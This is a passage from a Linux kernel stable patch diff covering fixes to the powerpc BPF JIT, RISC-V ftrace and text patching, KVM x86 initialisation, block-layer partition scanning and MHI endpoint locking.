+@@ -395,7 +395,7 @@ void __delay(unsigned long loops)
+ }
+ EXPORT_SYMBOL(__delay);
+ 
+-void udelay(unsigned long usecs)
++void __no_kcsan udelay(unsigned long usecs)
+ {
+ 	__delay(tb_ticks_per_usec * usecs);
+ }
+diff --git a/arch/powerpc/net/bpf_jit_comp32.c b/arch/powerpc/net/bpf_jit_comp32.c
+index a379b0ce19ffa..8643b2c8b76ef 100644
+--- a/arch/powerpc/net/bpf_jit_comp32.c
++++ b/arch/powerpc/net/bpf_jit_comp32.c
+@@ -79,6 +79,20 @@ static int bpf_jit_stack_offsetof(struct codegen_context *ctx, int reg)
+ #define SEEN_NVREG_FULL_MASK	0x0003ffff /* Non volatile registers r14-r31 */
+ #define SEEN_NVREG_TEMP_MASK	0x00001e01 /* BPF_REG_5, BPF_REG_AX, TMP_REG */
+ 
++static inline bool bpf_has_stack_frame(struct codegen_context *ctx)
++{
++	/*
++	 * We only need a stack frame if:
++	 * - we call other functions (kernel helpers), or
++	 * - we use non volatile registers, or
++	 * - we use tail call counter
++	 * - the bpf program uses its stack area
++	 * The latter condition is deduced from the usage of BPF_REG_FP
++	 */
++	return ctx->seen & (SEEN_FUNC | SEEN_TAILCALL | SEEN_NVREG_FULL_MASK) ||
++	       bpf_is_seen_register(ctx, bpf_to_ppc(BPF_REG_FP));
++}
++
+ void bpf_jit_realloc_regs(struct codegen_context *ctx)
+ {
+ 	unsigned int nvreg_mask;
+@@ -118,7 +132,8 @@ void bpf_jit_build_prologue(u32 *image, struct codegen_context *ctx)
+ 
+ #define BPF_TAILCALL_PROLOGUE_SIZE	4
+ 
+-	EMIT(PPC_RAW_STWU(_R1, _R1, -BPF_PPC_STACKFRAME(ctx)));
++	if (bpf_has_stack_frame(ctx))
++		EMIT(PPC_RAW_STWU(_R1, _R1, -BPF_PPC_STACKFRAME(ctx)));
+ 
+ 	if (ctx->seen & SEEN_TAILCALL)
+ 		EMIT(PPC_RAW_STW(_R4, _R1, bpf_jit_stack_offsetof(ctx, BPF_PPC_TC)));
+@@ -171,7 +186,8 @@ static void bpf_jit_emit_common_epilogue(u32 *image, struct codegen_context *ctx
+ 		EMIT(PPC_RAW_LWZ(_R0, _R1, BPF_PPC_STACKFRAME(ctx) + PPC_LR_STKOFF));
+ 
+ 	/* Tear down our stack frame */
+-	EMIT(PPC_RAW_ADDI(_R1, _R1, BPF_PPC_STACKFRAME(ctx)));
++	if (bpf_has_stack_frame(ctx))
++		EMIT(PPC_RAW_ADDI(_R1, _R1, BPF_PPC_STACKFRAME(ctx)));
+ 
+ 	if (ctx->seen & SEEN_FUNC)
+ 		EMIT(PPC_RAW_MTLR(_R0));
+diff --git a/arch/riscv/Makefile b/arch/riscv/Makefile
+index ba8050e63acfb..8b4ddccea2795 100644
+--- a/arch/riscv/Makefile
++++ b/arch/riscv/Makefile
+@@ -87,6 +87,13 @@ endif
+ # Avoid generating .eh_frame sections.
+ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables
+ 
++# The RISC-V attributes frequently cause compatibility issues and provide no
++# information, so just turn them off.
++KBUILD_CFLAGS += $(call cc-option,-mno-riscv-attribute)
++KBUILD_AFLAGS += $(call cc-option,-mno-riscv-attribute)
++KBUILD_CFLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++KBUILD_AFLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++
+ KBUILD_CFLAGS_MODULE += $(call cc-option,-mno-relax)
+ KBUILD_AFLAGS_MODULE += $(call as-option,-Wa$(comma)-mno-relax)
+ 
+diff --git a/arch/riscv/include/asm/ftrace.h b/arch/riscv/include/asm/ftrace.h
+index 9e73922e1e2e5..d47d87c2d7e3d 100644
+--- a/arch/riscv/include/asm/ftrace.h
++++ b/arch/riscv/include/asm/ftrace.h
+@@ -109,6 +109,6 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec);
+ #define ftrace_init_nop ftrace_init_nop
+ #endif
+ 
+-#endif
++#endif /* CONFIG_DYNAMIC_FTRACE */
+ 
+ #endif /* _ASM_RISCV_FTRACE_H */
+diff --git a/arch/riscv/include/asm/parse_asm.h b/arch/riscv/include/asm/parse_asm.h
+index f36368de839f5..3cd00332d70f5 100644
+--- a/arch/riscv/include/asm/parse_asm.h
++++ b/arch/riscv/include/asm/parse_asm.h
+@@ -3,6 +3,9 @@
+  * Copyright (C) 2020 SiFive
+  */
+ 
++#ifndef _ASM_RISCV_INSN_H
++#define _ASM_RISCV_INSN_H
++
+ #include <linux/bits.h>
+ 
+ /* The bit field of immediate value in I-type instruction */
+@@ -217,3 +220,5 @@ static inline bool is_ ## INSN_NAME ## _insn(long insn) \
+ 	(RVC_X(x_, RVC_B_IMM_5_OPOFF, RVC_B_IMM_5_MASK) << RVC_B_IMM_5_OFF) | \
+ 	(RVC_X(x_, RVC_B_IMM_7_6_OPOFF, RVC_B_IMM_7_6_MASK) << RVC_B_IMM_7_6_OFF) | \
+ 	(RVC_IMM_SIGN(x_) << RVC_B_IMM_SIGN_OFF); })
++
++#endif /* _ASM_RISCV_INSN_H */
+diff --git a/arch/riscv/include/asm/patch.h b/arch/riscv/include/asm/patch.h
+index 9a7d7346001ee..98d9de07cba17 100644
+--- a/arch/riscv/include/asm/patch.h
++++ b/arch/riscv/include/asm/patch.h
+@@ -9,4 +9,6 @@
+ int patch_text_nosync(void *addr, const void *insns, size_t len);
+ int patch_text(void *addr, u32 insn);
+ 
++extern int riscv_patch_in_stop_machine;
++
+ #endif /* _ASM_RISCV_PATCH_H */
+diff --git a/arch/riscv/kernel/compat_vdso/Makefile b/arch/riscv/kernel/compat_vdso/Makefile
+index 260daf3236d3a..7f34f3c7c8827 100644
+--- a/arch/riscv/kernel/compat_vdso/Makefile
++++ b/arch/riscv/kernel/compat_vdso/Makefile
+@@ -14,6 +14,10 @@ COMPAT_LD := $(LD)
+ COMPAT_CC_FLAGS := -march=rv32g -mabi=ilp32
+ COMPAT_LD_FLAGS := -melf32lriscv
+ 
++# Disable attributes, as they're useless and break the build.
++COMPAT_CC_FLAGS += $(call cc-option,-mno-riscv-attribute)
++COMPAT_CC_FLAGS += $(call as-option,-Wa$(comma)-mno-arch-attr)
++
+ # Files to link into the compat_vdso
+ obj-compat_vdso = $(patsubst %, %.o, $(compat_vdso-syms)) note.o
+ 
+diff --git a/arch/riscv/kernel/ftrace.c b/arch/riscv/kernel/ftrace.c
+index 5bff37af4770b..03a6434a8cdd0 100644
+--- a/arch/riscv/kernel/ftrace.c
++++ b/arch/riscv/kernel/ftrace.c
+@@ -15,10 +15,19 @@
+ void ftrace_arch_code_modify_prepare(void) __acquires(&text_mutex)
+ {
+ 	mutex_lock(&text_mutex);
++
++	/*
++	 * The code sequences we use for ftrace can't be patched while the
++	 * kernel is running, so we need to use stop_machine() to modify them
++	 * for now.  This doesn't play nice with text_mutex, we use this flag
++	 * to elide the check.
++	 */
++	riscv_patch_in_stop_machine = true;
+ }
+ 
+ void ftrace_arch_code_modify_post_process(void) __releases(&text_mutex)
+ {
++	riscv_patch_in_stop_machine = false;
+ 	mutex_unlock(&text_mutex);
+ }
+ 
+@@ -107,9 +116,9 @@ int ftrace_init_nop(struct module *mod, struct dyn_ftrace *rec)
+ {
+ 	int out;
+ 
+-	ftrace_arch_code_modify_prepare();
++	mutex_lock(&text_mutex);
+ 	out = ftrace_make_nop(mod, rec, MCOUNT_ADDR);
+-	ftrace_arch_code_modify_post_process();
++	mutex_unlock(&text_mutex);
+ 
+ 	return out;
+ }
+diff --git a/arch/riscv/kernel/patch.c b/arch/riscv/kernel/patch.c
+index 765004b605132..e099961453cca 100644
+--- a/arch/riscv/kernel/patch.c
++++ b/arch/riscv/kernel/patch.c
+@@ -11,6 +11,7 @@
+ #include <asm/kprobes.h>
+ #include <asm/cacheflush.h>
+ #include <asm/fixmap.h>
++#include <asm/ftrace.h>
+ #include <asm/patch.h>
+ 
+ struct patch_insn {
+@@ -19,6 +20,8 @@ struct patch_insn {
+ 	atomic_t cpu_count;
+ };
+ 
++int riscv_patch_in_stop_machine = false;
++
+ #ifdef CONFIG_MMU
+ /*
+  * The fix_to_virt(, idx) needs a const value (not a dynamic variable of
+@@ -59,8 +62,15 @@ static int patch_insn_write(void *addr, const void *insn, size_t len)
+ 	 * Before reaching here, it was expected to lock the text_mutex
+ 	 * already, so we don't need to give another lock here and could
+ 	 * ensure that it was safe between each cores.
++	 *
++	 * We're currently using stop_machine() for ftrace & kprobes, and while
++	 * that ensures text_mutex is held before installing the mappings it
++	 * does not ensure text_mutex is held by the calling thread.  That's
++	 * safe but triggers a lockdep failure, so just elide it for that
++	 * specific case.
+ 	 */
+-	lockdep_assert_held(&text_mutex);
++	if (!riscv_patch_in_stop_machine)
++		lockdep_assert_held(&text_mutex);
+ 
+ 	if (across_pages)
+ 		patch_map(addr + len, FIX_TEXT_POKE1);
+@@ -121,13 +131,25 @@ NOKPROBE_SYMBOL(patch_text_cb);
+ 
+ int patch_text(void *addr, u32 insn)
+ {
++	int ret;
+ 	struct patch_insn patch = {
+ 		.addr = addr,
+ 		.insn = insn,
+ 		.cpu_count = ATOMIC_INIT(0),
+ 	};
+ 
+-	return stop_machine_cpuslocked(patch_text_cb,
+-				       &patch, cpu_online_mask);
++	/*
++	 * kprobes takes text_mutex, before calling patch_text(), but as we call
++	 * calls stop_machine(), the lockdep assertion in patch_insn_write()
++	 * gets confused by the context in which the lock is taken.
++	 * Instead, ensure the lock is held before calling stop_machine(), and
++	 * set riscv_patch_in_stop_machine to skip the check in
++	 * patch_insn_write().
++	 */
++	lockdep_assert_held(&text_mutex);
++	riscv_patch_in_stop_machine = true;
++	ret = stop_machine_cpuslocked(patch_text_cb, &patch, cpu_online_mask);
++	riscv_patch_in_stop_machine = false;
++	return ret;
+ }
+ NOKPROBE_SYMBOL(patch_text);
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 85cd5442d2f81..17d7383f201a5 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -92,7 +92,7 @@ void notrace walk_stackframe(struct task_struct *task,
+ 	while (!kstack_end(ksp)) {
+ 		if (__kernel_text_address(pc) && unlikely(!fn(arg, pc)))
+ 			break;
+-		pc = (*ksp++) - 0x4;
++		pc = READ_ONCE_NOCHECK(*ksp++) - 0x4;
+ 	}
+ }
+ 
+diff --git a/arch/um/kernel/vmlinux.lds.S b/arch/um/kernel/vmlinux.lds.S
+index 16e49bfa2b426..53d719c04ba94 100644
+--- a/arch/um/kernel/vmlinux.lds.S
++++ b/arch/um/kernel/vmlinux.lds.S
+@@ -1,4 +1,4 @@
+-
++#define RUNTIME_DISCARD_EXIT
+ KERNEL_STACK_SIZE = 4096 * (1 << CONFIG_KERNEL_STACK_ORDER);
+ 
+ #ifdef CONFIG_LD_SCRIPT_STATIC
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index f05ebaa26f0ff..ef8cabfbe8540 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1695,6 +1695,9 @@ extern struct kvm_x86_ops kvm_x86_ops;
+ #define KVM_X86_OP_OPTIONAL_RET0 KVM_X86_OP
+ #include <asm/kvm-x86-ops.h>
+ 
++int kvm_x86_vendor_init(struct kvm_x86_init_ops *ops);
++void kvm_x86_vendor_exit(void);
++
+ #define __KVM_HAVE_ARCH_VM_ALLOC
+ static inline struct kvm *kvm_arch_alloc_vm(void)
+ {
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index c75d75b9f11aa..d2dbbc50b3a7b 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -880,6 +880,15 @@ void init_spectral_chicken(struct cpuinfo_x86 *c)
+ 		}
+ 	}
+ #endif
++	/*
++	 * Work around Erratum 1386.  The XSAVES instruction malfunctions in
++	 * certain circumstances on Zen1/2 uarch, and not all parts have had
++	 * updated microcode at the time of writing (March 2023).
++	 *
++	 * Affected parts all have no supervisor XSAVE states, meaning that
++	 * the XSAVEC instruction (which works fine) is equivalent.
++	 */
++	clear_cpu_cap(c, X86_FEATURE_XSAVES);
+ }
+ 
+ static void init_amd_zn(struct cpuinfo_x86 *c)
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index bfe93a1c4f92e..3629dd979667c 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -5080,15 +5080,34 @@ static struct kvm_x86_init_ops svm_init_ops __initdata = {
+ 
+ static int __init svm_init(void)
+ {
++	int r;
++
+ 	__unused_size_checks();
+ 
+-	return kvm_init(&svm_init_ops, sizeof(struct vcpu_svm),
+-			__alignof__(struct vcpu_svm), THIS_MODULE);
++	r = kvm_x86_vendor_init(&svm_init_ops);
++	if (r)
++		return r;
++
++	/*
++	 * Common KVM initialization _must_ come last, after this, /dev/kvm is
++	 * exposed to userspace!
++	 */
++	r = kvm_init(&svm_init_ops, sizeof(struct vcpu_svm),
++		     __alignof__(struct vcpu_svm), THIS_MODULE);
++	if (r)
++		goto err_kvm_init;
++
++	return 0;
++
++err_kvm_init:
++	kvm_x86_vendor_exit();
++	return r;
+ }
+ 
+ static void __exit svm_exit(void)
+ {
+ 	kvm_exit();
++	kvm_x86_vendor_exit();
+ }
+ 
+ module_init(svm_init)
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index f5c1cb7cec8a7..bc868958e91fe 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -551,6 +551,33 @@ static int hv_enable_direct_tlbflush(struct kvm_vcpu *vcpu)
+ 	return 0;
+ }
+ 
++static void hv_reset_evmcs(void)
++{
++	struct hv_vp_assist_page *vp_ap;
++
++	if (!static_branch_unlikely(&enable_evmcs))
++		return;
++
++	/*
++	 * KVM should enable eVMCS if and only if all CPUs have a VP assist
++	 * page, and should reject CPU onlining if eVMCS is enabled the CPU
++	 * doesn't have a VP assist page allocated.
++	 */
++	vp_ap = hv_get_vp_assist_page(smp_processor_id());
++	if (WARN_ON_ONCE(!vp_ap))
++		return;
++
++	/*
++	 * Reset everything to support using non-enlightened VMCS access later
++	 * (e.g. when we reload the module with enlightened_vmcs=0)
++	 */
++	vp_ap->nested_control.features.directhypercall = 0;
++	vp_ap->current_nested_vmcs = 0;
++	vp_ap->enlighten_vmentry = 0;
++}
++
++#else /* IS_ENABLED(CONFIG_HYPERV) */
++static void hv_reset_evmcs(void) {}
+ #endif /* IS_ENABLED(CONFIG_HYPERV) */
+ 
+ /*
+@@ -2501,6 +2528,8 @@ static void vmx_hardware_disable(void)
+ 	if (cpu_vmxoff())
+ 		kvm_spurious_fault();
+ 
++	hv_reset_evmcs();
++
+ 	intel_pt_handle_vmx(0);
+ }
+ 
+@@ -8427,41 +8456,23 @@ static void vmx_cleanup_l1d_flush(void)
+ 	l1tf_vmx_mitigation = VMENTER_L1D_FLUSH_AUTO;
+ }
+ 
+-static void vmx_exit(void)
++static void __vmx_exit(void)
+ {
++	allow_smaller_maxphyaddr = false;
++
+ #ifdef CONFIG_KEXEC_CORE
+ 	RCU_INIT_POINTER(crash_vmclear_loaded_vmcss, NULL);
+ 	synchronize_rcu();
+ #endif
++	vmx_cleanup_l1d_flush();
++}
+ 
++static void vmx_exit(void)
++{
+ 	kvm_exit();
++	kvm_x86_vendor_exit();
+ 
+-#if IS_ENABLED(CONFIG_HYPERV)
+-	if (static_branch_unlikely(&enable_evmcs)) {
+-		int cpu;
+-		struct hv_vp_assist_page *vp_ap;
+-		/*
+-		 * Reset everything to support using non-enlightened VMCS
+-		 * access later (e.g. when we reload the module with
+-		 * enlightened_vmcs=0)
+-		 */
+-		for_each_online_cpu(cpu) {
+-			vp_ap =	hv_get_vp_assist_page(cpu);
+-
+-			if (!vp_ap)
+-				continue;
+-
+-			vp_ap->nested_control.features.directhypercall = 0;
+-			vp_ap->current_nested_vmcs = 0;
+-			vp_ap->enlighten_vmentry = 0;
+-		}
+-
+-		static_branch_disable(&enable_evmcs);
+-	}
+-#endif
+-	vmx_cleanup_l1d_flush();
+-
+-	allow_smaller_maxphyaddr = false;
++	__vmx_exit();
+ }
+ module_exit(vmx_exit);
+ 
+@@ -8502,23 +8513,20 @@ static int __init vmx_init(void)
+ 	}
+ #endif
+ 
+-	r = kvm_init(&vmx_init_ops, sizeof(struct vcpu_vmx),
+-		     __alignof__(struct vcpu_vmx), THIS_MODULE);
++	r = kvm_x86_vendor_init(&vmx_init_ops);
+ 	if (r)
+ 		return r;
+ 
+ 	/*
+-	 * Must be called after kvm_init() so enable_ept is properly set
++	 * Must be called after common x86 init so enable_ept is properly set
+ 	 * up. Hand the parameter mitigation value in which was stored in
+ 	 * the pre module init parser. If no parameter was given, it will
+ 	 * contain 'auto' which will be turned into the default 'cond'
+ 	 * mitigation mode.
+ 	 */
+ 	r = vmx_setup_l1d_flush(vmentry_l1d_flush_param);
+-	if (r) {
+-		vmx_exit();
+-		return r;
+-	}
++	if (r)
++		goto err_l1d_flush;
+ 
+ 	vmx_setup_fb_clear_ctrl();
+ 
+@@ -8542,6 +8550,21 @@ static int __init vmx_init(void)
+ 	if (!enable_ept)
+ 		allow_smaller_maxphyaddr = true;
+ 
++	/*
++	 * Common KVM initialization _must_ come last, after this, /dev/kvm is
++	 * exposed to userspace!
++	 */
++	r = kvm_init(&vmx_init_ops, sizeof(struct vcpu_vmx),
++		     __alignof__(struct vcpu_vmx), THIS_MODULE);
++	if (r)
++		goto err_kvm_init;
++
+ 	return 0;
++
++err_kvm_init:
++	__vmx_exit();
++err_l1d_flush:
++	kvm_x86_vendor_exit();
++	return r;
+ }
+ module_init(vmx_init);
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index 68827b8dc37a5..ab09d292bdede 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -9351,7 +9351,16 @@ static struct notifier_block pvclock_gtod_notifier = {
+ 
+ int kvm_arch_init(void *opaque)
+ {
+-	struct kvm_x86_init_ops *ops = opaque;
++	return 0;
++}
++
++void kvm_arch_exit(void)
++{
++
++}
++
++int kvm_x86_vendor_init(struct kvm_x86_init_ops *ops)
++{
+ 	u64 host_pat;
+ 	int r;
+ 
+@@ -9441,8 +9450,9 @@ out_free_x86_emulator_cache:
+ 	kmem_cache_destroy(x86_emulator_cache);
+ 	return r;
+ }
++EXPORT_SYMBOL_GPL(kvm_x86_vendor_init);
+ 
+-void kvm_arch_exit(void)
++void kvm_x86_vendor_exit(void)
+ {
+ #ifdef CONFIG_X86_64
+ 	if (hypervisor_is_type(X86_HYPER_MS_HYPERV))
+@@ -9468,6 +9478,7 @@ void kvm_arch_exit(void)
+ 	WARN_ON(static_branch_unlikely(&kvm_xen_enabled.key));
+ #endif
+ }
++EXPORT_SYMBOL_GPL(kvm_x86_vendor_exit);
+ 
+ static int __kvm_emulate_halt(struct kvm_vcpu *vcpu, int state, int reason)
+ {
+diff --git a/block/blk.h b/block/blk.h
+index 8b75a95b28d60..a186ea20f39d8 100644
+--- a/block/blk.h
++++ b/block/blk.h
+@@ -436,7 +436,7 @@ static inline struct kmem_cache *blk_get_queue_kmem_cache(bool srcu)
+ }
+ struct request_queue *blk_alloc_queue(int node_id, bool alloc_srcu);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner);
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode);
+ 
+ int disk_alloc_events(struct gendisk *disk);
+ void disk_add_events(struct gendisk *disk);
+diff --git a/block/genhd.c b/block/genhd.c
+index c4765681a8b4b..0b6928e948f31 100644
+--- a/block/genhd.c
++++ b/block/genhd.c
+@@ -356,9 +356,10 @@ void disk_uevent(struct gendisk *disk, enum kobject_action action)
+ }
+ EXPORT_SYMBOL_GPL(disk_uevent);
+ 
+-int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
++int disk_scan_partitions(struct gendisk *disk, fmode_t mode)
+ {
+ 	struct block_device *bdev;
++	int ret = 0;
+ 
+ 	if (disk->flags & (GENHD_FL_NO_PART | GENHD_FL_HIDDEN))
+ 		return -EINVAL;
+@@ -366,16 +367,29 @@ int disk_scan_partitions(struct gendisk *disk, fmode_t mode, void *owner)
+ 		return -EINVAL;
+ 	if (disk->open_partitions)
+ 		return -EBUSY;
+-	/* Someone else has bdev exclusively open? */
+-	if (disk->part0->bd_holder && disk->part0->bd_holder != owner)
+-		return -EBUSY;
+ 
+ 	set_bit(GD_NEED_PART_SCAN, &disk->state);
+-	bdev = blkdev_get_by_dev(disk_devt(disk), mode, NULL);
++	/*
++	 * If the device is opened exclusively by current thread already, it's
++	 * safe to scan partitons, otherwise, use bd_prepare_to_claim() to
++	 * synchronize with other exclusive openers and other partition
++	 * scanners.
++	 */
++	if (!(mode & FMODE_EXCL)) {
++		ret = bd_prepare_to_claim(disk->part0, disk_scan_partitions);
++		if (ret)
++			return ret;
++	}
++
++	bdev = blkdev_get_by_dev(disk_devt(disk), mode & ~FMODE_EXCL, NULL);
+ 	if (IS_ERR(bdev))
+-		return PTR_ERR(bdev);
+-	blkdev_put(bdev, mode);
+-	return 0;
++		ret =  PTR_ERR(bdev);
++	else
++		blkdev_put(bdev, mode & ~FMODE_EXCL);
++
++	if (!(mode & FMODE_EXCL))
++		bd_abort_claiming(disk->part0, disk_scan_partitions);
++	return ret;
+ }
+ 
+ /**
+@@ -501,9 +515,14 @@ int __must_check device_add_disk(struct device *parent, struct gendisk *disk,
+ 		if (ret)
+ 			goto out_unregister_bdi;
+ 
++		/* Make sure the first partition scan will be proceed */
++		if (get_capacity(disk) && !(disk->flags & GENHD_FL_NO_PART) &&
++		    !test_bit(GD_SUPPRESS_PART_SCAN, &disk->state))
++			set_bit(GD_NEED_PART_SCAN, &disk->state);
++
+ 		bdev_add(disk->part0, ddev->devt);
+ 		if (get_capacity(disk))
+-			disk_scan_partitions(disk, FMODE_READ, NULL);
++			disk_scan_partitions(disk, FMODE_READ);
+ 
+ 		/*
+ 		 * Announce the disk and partitions after all partitions are
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 96617512982e5..9c5f637ff153f 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -467,10 +467,10 @@ static int blkdev_bszset(struct block_device *bdev, fmode_t mode,
+  * user space. Note the separate arg/argp parameters that are needed
+  * to deal with the compat_ptr() conversion.
+  */
+-static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
+-			       unsigned long arg, void __user *argp)
++static int blkdev_common_ioctl(struct block_device *bdev, fmode_t mode,
++			       unsigned int cmd, unsigned long arg,
++			       void __user *argp)
+ {
+-	struct block_device *bdev = I_BDEV(file->f_mapping->host);
+ 	unsigned int max_sectors;
+ 
+ 	switch (cmd) {
+@@ -528,8 +528,7 @@ static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
+ 			return -EACCES;
+ 		if (bdev_is_partition(bdev))
+ 			return -EINVAL;
+-		return disk_scan_partitions(bdev->bd_disk, mode & ~FMODE_EXCL,
+-					    file);
++		return disk_scan_partitions(bdev->bd_disk, mode);
+ 	case BLKTRACESTART:
+ 	case BLKTRACESTOP:
+ 	case BLKTRACETEARDOWN:
+@@ -607,7 +606,7 @@ long blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
+ 	if (ret != -ENOIOCTLCMD)
+ 		return ret;
+ 
+@@ -676,7 +675,7 @@ long compat_blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
+ 	if (ret == -ENOIOCTLCMD && disk->fops->compat_ioctl)
+ 		ret = disk->fops->compat_ioctl(bdev, mode, cmd, arg);
+ 
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 357c61c12ce5b..edd153dda40c0 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -990,44 +990,25 @@ static void mhi_ep_abort_transfer(struct mhi_ep_cntrl *mhi_cntrl)
+ static void mhi_ep_reset_worker(struct work_struct *work)
+ {
+ 	struct mhi_ep_cntrl *mhi_cntrl = container_of(work, struct mhi_ep_cntrl, reset_work);
+-	struct device *dev = &mhi_cntrl->mhi_dev->dev;
+ 	enum mhi_state cur_state;
+-	int ret;
+ 
+-	mhi_ep_abort_transfer(mhi_cntrl);
++	mhi_ep_power_down(mhi_cntrl);
++
++	mutex_lock(&mhi_cntrl->state_lock);
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
+ 	/* Reset MMIO to signal host that the MHI_RESET is completed in endpoint */
+ 	mhi_ep_mmio_reset(mhi_cntrl);
+ 	cur_state = mhi_cntrl->mhi_state;
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+ 
+ 	/*
+ 	 * Only proceed further if the reset is due to SYS_ERR. The host will
+ 	 * issue reset during shutdown also and we don't need to do re-init in
+ 	 * that case.
+ 	 */
+-	if (cur_state == MHI_STATE_SYS_ERR) {
+-		mhi_ep_mmio_init(mhi_cntrl);
+-
+-		/* Set AMSS EE before signaling ready state */
+-		mhi_ep_mmio_set_env(mhi_cntrl, MHI_EE_AMSS);
+-
+-		/* All set, notify the host that we are ready */
+-		ret = mhi_ep_set_ready_state(mhi_cntrl);
+-		if (ret)
+-			return;
+-
+-		dev_dbg(dev, "READY state notification sent to the host\n");
++	if (cur_state == MHI_STATE_SYS_ERR)
++		mhi_ep_power_up(mhi_cntrl);
+ 
+-		ret = mhi_ep_enable(mhi_cntrl);
+-		if (ret) {
+-			dev_err(dev, "Failed to enable MHI endpoint: %d\n", ret);
+-			return;
+-		}
+-
+-		enable_irq(mhi_cntrl->irq);
+-	}
++	mutex_unlock(&mhi_cntrl->state_lock);
+ }
+ 
+ /*
+@@ -1106,11 +1087,11 @@ EXPORT_SYMBOL_GPL(mhi_ep_power_up);
+ 
+ void mhi_ep_power_down(struct mhi_ep_cntrl *mhi_cntrl)
+ {
+-	if (mhi_cntrl->enabled)
++	if (mhi_cntrl->enabled) {
+ 		mhi_ep_abort_transfer(mhi_cntrl);
+-
+-	kfree(mhi_cntrl->mhi_event);
+-	disable_irq(mhi_cntrl->irq);
++		kfree(mhi_cntrl->mhi_event);
++		disable_irq(mhi_cntrl->irq);
++	}
+ }
+ EXPORT_SYMBOL_GPL(mhi_ep_power_down);
+ 
+@@ -1400,8 +1381,8 @@ int mhi_ep_register_controller(struct mhi_ep_cntrl *mhi_cntrl,
+ 
+ 	INIT_LIST_HEAD(&mhi_cntrl->st_transition_list);
+ 	INIT_LIST_HEAD(&mhi_cntrl->ch_db_list);
+-	spin_lock_init(&mhi_cntrl->state_lock);
+ 	spin_lock_init(&mhi_cntrl->list_lock);
++	mutex_init(&mhi_cntrl->state_lock);
+ 	mutex_init(&mhi_cntrl->event_lock);
+ 
+ 	/* Set MHI version and AMSS EE before enumeration */
+diff --git a/drivers/bus/mhi/ep/sm.c b/drivers/bus/mhi/ep/sm.c
+index 3655c19e23c7b..fd200b2ac0bb2 100644
+--- a/drivers/bus/mhi/ep/sm.c
++++ b/drivers/bus/mhi/ep/sm.c
+@@ -63,24 +63,23 @@ int mhi_ep_set_m0_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	int ret;
+ 
+ 	/* If MHI is in M3, resume suspended channels */
+-	spin_lock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
++
+ 	old_state = mhi_cntrl->mhi_state;
+ 	if (old_state == MHI_STATE_M3)
+ 		mhi_ep_resume_channels(mhi_cntrl);
+ 
+ 	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M0);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+-
+ 	if (ret) {
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	/* Signal host that the device moved to M0 */
+ 	ret = mhi_ep_send_state_change_event(mhi_cntrl, MHI_STATE_M0);
+ 	if (ret) {
+ 		dev_err(dev, "Failed sending M0 state change event\n");
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	if (old_state == MHI_STATE_READY) {
+@@ -88,11 +87,14 @@ int mhi_ep_set_m0_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 		ret = mhi_ep_send_ee_event(mhi_cntrl, MHI_EE_AMSS);
+ 		if (ret) {
+ 			dev_err(dev, "Failed sending AMSS EE event\n");
+-			return ret;
++			goto err_unlock;
+ 		}
+ 	}
+ 
+-	return 0;
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
++	return ret;
+ }
+ 
+ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+@@ -100,13 +102,12 @@ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
+ 	int ret;
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
+-	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M3);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
+ 
